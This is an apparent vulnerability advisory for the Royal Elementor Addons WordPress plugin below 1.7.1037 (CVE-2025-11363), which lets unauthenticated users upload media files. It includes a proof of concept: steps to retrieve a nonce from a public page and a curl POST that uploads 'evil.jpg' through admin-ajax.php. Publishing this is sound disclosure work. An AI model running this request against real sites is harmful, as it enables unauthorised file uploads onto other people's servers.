Royal Elementor Addons and Templates < 1.7.1037 – Unauthenticated Media File Upload | CVE 2025-11363 | Plugin Vulnerabilities

Description

The plugin does not have proper authorisation, allowing unauthenticated users to upload media files via the wpr_addons_upload_file action.

Proof of Concept

1. Go to "Royal Addons > Template Kit"
2. Click on "Landing Page - Business V3"
3. In the Modal, click "Import Templates Kit"
4. When it finishes, view the site in a new private window
5. In the browser console, get type `WprConfig` and get the nonce

Run the command:

curl -X POST http://example.com/wp-admin/admin-ajax.php \
-F "action=wpr_addons_upload_file" \
-F "triggering_event=click" \
-F "wpr_addons_nonce=<<ADD_NONCE>>" \
-F "uploaded_file=@evil.jpg"

The file will be accessible in `/wp-content/uploads/wpr-addons/forms`

Affects Plugins

royal-elementor-addons

Fixed in 1.7.1037

References

CVE

Miscellaneous

Original Researcher

Envel Le Clainche

Submitter

Envel Le Clainche

Submitter website

https://nostra-node.fr

Verified

Yes

WPVDB ID

b2eadb7a-30a4-44c7-a420-849484faccf4

Timeline

Publicly Published

2025-11-24 (about 1 month ago)

Added

2025-11-24 (about 1 month ago)

Last Updated

2025-11-24 (about 1 month ago)

Other

Published

Title

Published

2019-02-01

Title

Meta Box < 4.16.2 - Mishandled Uploaded Files

Published

2024-09-30

Title

Wechat Social login <= 1.3.0 - Unauthenticated Arbitrary File Upload

Published

2025-07-22

Title

ReachShip WooCommerce Multi-Carrier & Conditional Shipping < 4.3.2 - Authenticated (Contributor+) Arbitrary File Upload

Published

2024-10-30

Title

Multi Purpose Mail Form <= 1.0.2 - Unauthenticated Arbitrary File Upload

Published

2025-11-20

Title

URL Image Importer < 1.0.7 - Authenticated (Author+) Arbitrary File Upload